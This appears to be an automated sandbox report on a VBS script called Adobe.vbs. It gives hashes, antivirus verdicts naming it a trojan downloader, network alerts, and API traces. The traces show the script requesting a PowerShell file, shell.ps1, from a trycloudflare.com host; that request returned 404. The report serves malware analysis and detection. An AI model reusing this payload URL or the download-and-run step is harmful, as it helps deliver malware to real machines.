Summary | ZeroBOX

Adobe.vbs

Category: FILE
Machine: s1_win7_x6401
Started: April 3, 2025, 9:57 a.m.
Completed: April 3, 2025, 9:59 a.m.
Size: 1.4KB
Type: ASCII text, with CRLF line terminators
MD5: 607e7e4b5eee718c11d6305f99fc7b4f
SHA256: 01fcffe559c031d49107df1d551e267736c2424a8bd64843bd041a6c6cd0eccc
CRC32: F5DC808D
ssdeep: 24:HvlG+hiXYJGBAWqah7PNiDqeqrsBOd2rO7X6OUVvUEw6:PlG+h5JEAs7P4VTiTSVlw6
Yara: None matched

IP Address | Status | Action
104.16.230.132 | Active | Moloch
164.124.101.2 | Active | Moloch

Suricata Alerts

Flow | SID | Signature | Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53 | 2034552 | ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com) | Potentially Bad Traffic
TCP 192.168.56.101:49161 -> 104.16.230.132:443 | 2058175 | ET HUNTING TryCloudFlare Domain in TLS SNI | Misc activity
TCP 192.168.56.101:49161 -> 104.16.230.132:443 | 2060250 | ET INFO Observed trycloudflare .com Domain in TLS SNI | Misc activity
TCP 192.168.56.101:49161 -> 104.16.230.132:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined

Suricata TLS

Flow | Issuer | Subject | Fingerprint
TLSv1 192.168.56.101:49161 -> 104.16.230.132:443 | C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94

request: GET https://dat-voip-sit-cio.trycloudflare.com/shell.ps1

Skyhigh | BehavesLike.VBS.Dropper.zp
Sangfor | Malware.Generic-Script.Save.d1d20a66
ESET-NOD32 | VBS/TrojanDownloader.Agent.ABVR
Kaspersky | HEUR:Trojan.VBS.Alien.gen
Rising | Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:dnjkLnnaHyD)
Ikarus | Win32.Outbreak
Microsoft | Trojan:VBS/Obfuse.ZDO!MTB

Time & API | Arguments | Status | Return | Repeated

InternetCrackUrlW

url: https://dat-voip-sit-cio.trycloudflare.com/shell.ps1
flags: 0
status: 1, return: 1, repeated: 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 12582912
http_method: GET
referer:
path: /shell.ps1
status: 1, return: 13369356, repeated: 0

InternetReadFile

buffer: <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'> <html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title> </head><body> <h1>404 Not Found</h1> <p>404 Not Found: /shell.ps1</p> <hr/> <a href='https://github.com/mar10/wsgidav/'>WsgiDAV/4.3.3</a> - 2025-04-02 20:57:21.063221 </body></html>
request_handle: 0x00cc000c
status: 1, return: 1, repeated: 0

send

buffer: !
socket: 820
sent: 1
status: 1, return: 1, repeated: 0

send

buffer: …gíÜæÄҚo®ÛP õƘxs0o ^æƒA_e¤‚/5 ÀÀÀ À 28@ÿ'%"dat-voip-sit-cio.trycloudflare.com  
socket: 948
sent: 138
status: 1, return: 138, repeated: 0

send

buffer: !
socket: 820
sent: 1
status: 1, return: 1, repeated: 0

send

buffer: FBA¤ 3AA *®ïlEpR¦•ØI •1òƬçòùðâQ>~_›—'ÍïXõŠ ç°§üOwɮܛûø¢§û£0qá3,A¤bJlô]ƯÅ”ã4êÜ ìԎ:,9¶H×ò‡ï2L˜¬É6“ꊚ[D
socket: 948
sent: 134
status: 1, return: 134, repeated: 0

send

buffer: !
socket: 820
sent: 1
status: 1, return: 1, repeated: 0

send

buffer: `¥V‹›½ê!Óe˜[ý#òì•é~%ó,Z^…·² ½LW–çü¾Éý.9RF2!,åa0CÝòoòÕMñÕs`;·0>g6b²S9ò-éŸDX鲏TcʅaÍ??i×®÷ an ٝ.¥ Üøï‰/ÿÌìp]±ª@ԇy 8¯Mþz¢|ßþéÓݧ˜ä2·ÏL]ÿR&4Þ.Ö×p‰è¤þÉ¨ôšê|Ôόëé…àƽµízF%‰ÊxÖ:Oø ø³nŽpP6PGØ ÜÈíÀ±Mø×zH$׶G?H{>þ ¯îEaA“éñ‘ânkKȁ3¢'’ºÓOg[.Õnoªd Ñ£¼O~Ó?¤Re{ÒÍ/Az=i€¹ûŸ ¾iÞ’cöË*˄‰» oÌ¡8>kù; ”³kÞV®¬wž2–Õ±
socket: 948
sent: 357
status: 1, return: 357, repeated: 0

send

buffer: !
socket: 820
sent: 1
status: 1, return: 1, repeated: 0